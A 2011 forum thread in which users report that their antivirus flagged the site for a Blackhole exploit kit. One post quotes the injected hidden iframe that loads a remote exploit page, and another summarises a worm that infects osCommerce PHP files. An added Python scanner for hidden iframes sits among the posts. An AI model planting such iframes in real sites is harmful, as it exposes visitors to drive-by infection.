Tuesday, 12 April 2011
OK I was just cruising the Dingwall Forum and my Symantec Endpoint Protection firewall/antivirus keeps giving me the following message: [b]"Web Attack: Blackhole Toolkit Website detected"[/b] Perhaps the webmasters should have a look to make sure the site has not been compromised. Thanks.
10 years ago
·
#20252
also getting detections
10 years ago
·
#20253
I am getting this message on this site only: Do you want open or save [b]jquery.js[/b] from [b]rthlsinks.cz.cc[/b] It just appeared this morning and it is not coming up anywhere else I have been on the net. I am running BitDefender anti virus and web protection.
10 years ago
·
#20254
Chrome told me the same about rthlsinks.cz.cc. There are iframes all along the source code: [code]<div style="display:none"><iframe src="http://rthlsinks.cz.cc/xp/index.php?tp=bdd9e836c0f58a18"></iframe></div>[/code] Could the webmaster do something fast, before everyone gets pwned by this?
10 years ago
·
#20255
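The hidden-iframe pattern quoted in the post above can be searched for mechanically. This is an added example, not part of the original thread: a Python scanner that flags iframes which are invisible (own or inherited `display:none`, or zero size) and load from a host other than the site's own. The hosts `forum.example` and `injected.example` and all function names are assumptions made for the illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
VOID = {"area", "base", "br", "col", "embed", "hr", "img", "input", "link", "meta", "source", "wbr"}

class HiddenIframeFinder(HTMLParser):
    """Report iframes that are invisible and load from a host other than the site's."""
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()  # exact match; subdomains count as foreign
        self.stack = []      # (tag, hidden) for every element still open
        self.findings = []   # (line number, src)

    @staticmethod
    def _hidden(attrs):
        a = {k: (v or "").strip() for k, v in attrs}
        return bool(HIDDEN_STYLE.search(a.get("style", ""))) or "0" in (a.get("width"), a.get("height"))

    def handle_starttag(self, tag, attrs):
        # An element is hidden if it, or any ancestor still open, is hidden.
        hidden = self._hidden(attrs) or any(h for _, h in self.stack)
        if tag == "iframe":
            src = dict(attrs).get("src") or ""
            host = (urlparse(src).hostname or "").lower()
            if hidden and host and host != self.site_host:
                self.findings.append((self.getpos()[0], src))
        if tag not in VOID:  # void elements never get a closing tag
            self.stack.append((tag, hidden))

    def handle_endtag(self, tag):
        # Pop back to the matching open tag; tolerates unclosed children.
        for i in range(len(self.stack) - 1, -1, -1):
            if self.stack[i][0] == tag:
                del self.stack[i:]
                break

def scan(html, site_host):
    finder = HiddenIframeFinder(site_host)
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample page; all hosts are placeholders.
SAMPLE = """<html><body>
<iframe src="/embed/map.html" width="400" height="300"></iframe>
<div style="display:none"><iframe src="http://injected.example/xp/index.php?tp=0000"></iframe></div>
<img style="display:none" src="pixel.gif">
<iframe src="https://video.example/embed/1" width="560" height="315"></iframe>
</body></html>"""
```

Calling `scan(SAMPLE, "forum.example")` returns the line number and `src` of the one hidden third-party frame; visible embeds and same-host frames are not reported.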
I've been poking around the 'net, and it looks like a very serious attack. Exploited vulnerabilities in Java have been at least partially addressed by Version 6, Update 24: http://java.com/en/download/index.jsp
10 years ago
·
#20256
I'm not getting any messages now and I see Jesse online so I presume he has it under control. Big thanks!!
10 years ago
·
#20257
For God's sake do not accept any invitation to download anything, it is a spyware worm. Do not open it!
10 years ago
·
#20258
Found something about it too: [quote]I've finally figured out how it works. It's a sort of worm that targets osCommerce. The encoded version is added to the end of PHP files that are writeable. The parts of tags that can be seen are actually used for placing the decoded version inside a file. These scripts then all trigger when a page is rendered and call the distant jquery file. This causes a dramatic slowdown of the infected website and it's no wonder as the distant accesses grow. I have yet to determine where the flaw is.[/quote] Do you use osCommerce for the online shop?
10 years ago
·
#20259
I've sent off an email to Sheldon about this. I received a warning on my iPhone today when I visited the site while at lunch at work...saying that 'windows had detected' something or other. Definitely something not right. PLEASE be careful and don't take ANY prompts that happen while you're on the Dingwall message board right now. Sheldon is aware of the situation and has asked Jesse to check it out. Please still be careful, folks...
10 years ago
·
#20260
Hi guys, the attack has now been handled. We've wiped out the infected file and installed a patch to prevent this kind of attack from happening again. Please let us know how it goes on your side.
10 years ago
·
#20263
Thanks Jesse!
10 years ago
·
#20264
Thanks for the quick repair.
10 years ago
·
#20265
Looking clear now. Thanks.